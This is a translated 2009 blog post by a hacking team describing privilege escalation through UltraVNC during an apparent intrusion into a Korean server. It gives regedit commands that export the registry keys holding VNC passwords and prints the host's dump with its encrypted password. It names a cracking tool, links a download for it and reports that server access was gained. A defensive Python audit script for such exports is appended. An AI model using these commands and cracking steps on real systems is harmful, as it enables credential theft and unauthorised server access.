
UltraVNC Privilege Escalation: Local Password Cracking

23 October 2009

Source: http://www.007hack.com/?p=122

Author: 007 Security Team, 不走的钟

UltraVNC is an open-source remote terminal software that is very widely used outside China. 不走的钟 ran into UltraVNC while penetrating a Korean server. The only privilege-escalation method found online reads the password from the VNC registry key, but it did not work against UltraVNC. After installing UltraVNC locally and testing, it turned out that cracking its local password differs from plain VNC only in where the password sits in the registry.

VNC registry location:

regedit -e c:\vnc.txt "HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4\"

UltraVNC registry location:

regedit -e c:\UltraVNC.txt "HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3"

C:\>type UltraVNC.txt

 Windows Registry Editor Version 5.00
 
 [HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3]
 "DebugMode"=dword:00000000
 "DebugLevel"=dword:00000000
 "AllowLoopback"=dword:00000000
 "LoopbackOnly"=dword:00000000
 "DisableTrayIcon"=dword:00000000
 "MSLogonRequired"=dword:00000000
 "NewMSLogon"=dword:00000000
 "UseDSMPlugin"=dword:00000000
 "ConnectPriority"=dword:00000000
 "DSMPlugin"=hex:00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
   00,00,00,00,00,00,00,00,00,00,00,39,a0,6e,79,11,a0,6e,79,20,ff,ba,00,00,00,\
   00,00,00,00,00,00,80,83,13,00,d8,ce,6e,79,00,00,00,00,00,00,00,00,00,00,00,\
   00,30,00,13,00,02,00,00,00,00,00,00,00,22,00,00,00,00,00,13,00,00,00,00,00,\
   00,00,00,00,40,b7,e5,77,1b,00,00,00,00,02,00,00,fc,ff,ba,00,00,00,00,00,00,\
   00,00,00,00,00,00,00,80,54,9a,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,\
   00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
   00,80,83,13,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
   00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
   00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
   00,00,00,00,00,00,00,00,00,00
 
 [HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
 "FileTransferEnabled"=dword:00000001
 "FTUserImpersonation"=dword:00000001
 "BlankMonitorEnabled"=dword:00000001
 "CaptureAlphaBlending"=dword:00000000
 "BlackAlphaBlending"=dword:00000000
 "DefaultScale"=dword:00000001
 "UseDSMPlugin"=dword:00000000
 "DSMPlugin"=hex:00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
   00,00,00,00,00,00,00,00,00,00,00,39,a0,6e,79,11,a0,6e,79,20,ff,ba,00,00,00,\
   00,00,00,00,00,00,80,83,13,00,d8,ce,6e,79,00,00,00,00,00,00,00,00,00,00,00,\
   00,30,00,13,00,02,00,00,00,00,00,00,00,22,00,00,00,00,00,13,00,00,00,00,00,\
   00,00,00,00,40,b7,e5,77,1b,00,00,00,00,02,00,00,fc,ff,ba,00,00,00,00,00,00,\
   00,00,00,00,00,00,00,80,54,9a,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,\
   00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
   00,80,83,13,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
   00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
   00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\
   00,00,00,00,00,00,00,00,00,00
 "SocketConnect"=dword:00000001
 "HTTPConnect"=dword:00000000
 "XDMCPConnect"=dword:00000000
 "AutoPortSelect"=dword:00000000
 "InputsEnabled"=dword:00000001
 "LocalInputsDisabled"=dword:00000000
 "IdleTimeout"=dword:00000000
 "QuerySetting"=dword:00000002
 "QueryTimeout"=dword:0000000a
 "QueryAccept"=dword:00000000
 "LockSetting"=dword:00000000
 "RemoveWallpaper"=dword:00000001
 "Password"=hex:5f,1f,74,21,f9,e2,15,e9
 "AllowShutdown"=dword:00000001
 "AllowProperties"=dword:00000001
 "AllowEditClients"=dword:00000001
 "PortNumber"=dword:00001713
 "HTTPPortNumber"=dword:000016af

The ciphertext can then be cracked with vncx4.exe:

(screenshot: passwd.psd)

In the end, access to the server was obtained!
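As an added defensive check (not part of the original post), the following Python audit parses a `regedit -e` export like the one above and flags the two settings that make this attack work: a classic `Password` value stored as 8 obfuscated bytes that any account able to read the key can recover, and `MSLogonRequired` set to 0 so Windows authentication is not enforced. The sample export is constructed, with a placeholder password value; `parse_reg` and `audit_ultravnc` are names chosen here.

```python
import re

# Constructed sample in the shape of a `regedit -e` dump of the UltraVNC keys.
# The Password bytes are a placeholder, not a value from any real host.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3]
"MSLogonRequired"=dword:00000000
"DSMPlugin"=hex:00,00,00,00,\
  00,00,00,00

[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
"FileTransferEnabled"=dword:00000001
"Password"=hex:00,11,22,33,44,55,66,77
"AllowProperties"=dword:00000001
"PortNumber"=dword:00001713
'''

def parse_reg(text):
    """Return {key_path: {value_name: (type, data)}} from .reg export text.
    Real exports are UTF-16LE with a BOM; decode the file first, the BOM is dropped here.
    Hex continuation lines (trailing backslash) are joined before parsing."""
    joined, buf = [], ""
    for line in text.replace("\ufeff", "").splitlines():
        if line.rstrip().endswith("\\"):
            buf += line.rstrip()[:-1].strip()
            continue
        joined.append(buf + line.strip())
        buf = ""
    keys, current = {}, None
    for line in joined:
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys[current] = {}
        elif current is not None and line.startswith('"'):
            m = re.match(r'"([^"]+)"=(dword|hex):(.*)$', line)  # string values skipped
            if m:
                keys[current][m.group(1)] = (m.group(2), m.group(3))
    return keys

def audit_ultravnc(text):
    """List the settings relevant to the stored-password weakness described above."""
    findings = []
    for key, values in parse_reg(text).items():
        if "Password" in values:
            n = len(values["Password"][1].split(","))
            findings.append(f"{key}: classic VNC password stored as {n} obfuscated bytes, "
                            "recoverable by anyone who can read this key")
        if values.get("MSLogonRequired") == ("dword", "00000000"):
            findings.append(f"{key}: MSLogonRequired=0, Windows authentication not enforced")
        if values.get("FileTransferEnabled") == ("dword", "00000001"):
            findings.append(f"{key}: file transfer enabled")
    return findings
```

On a real host, export the key as the post does, decode the file as UTF-16 and pass the text to `audit_ultravnc`; an empty list means no classic password is stored and MS Logon is required.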

Download: vncx4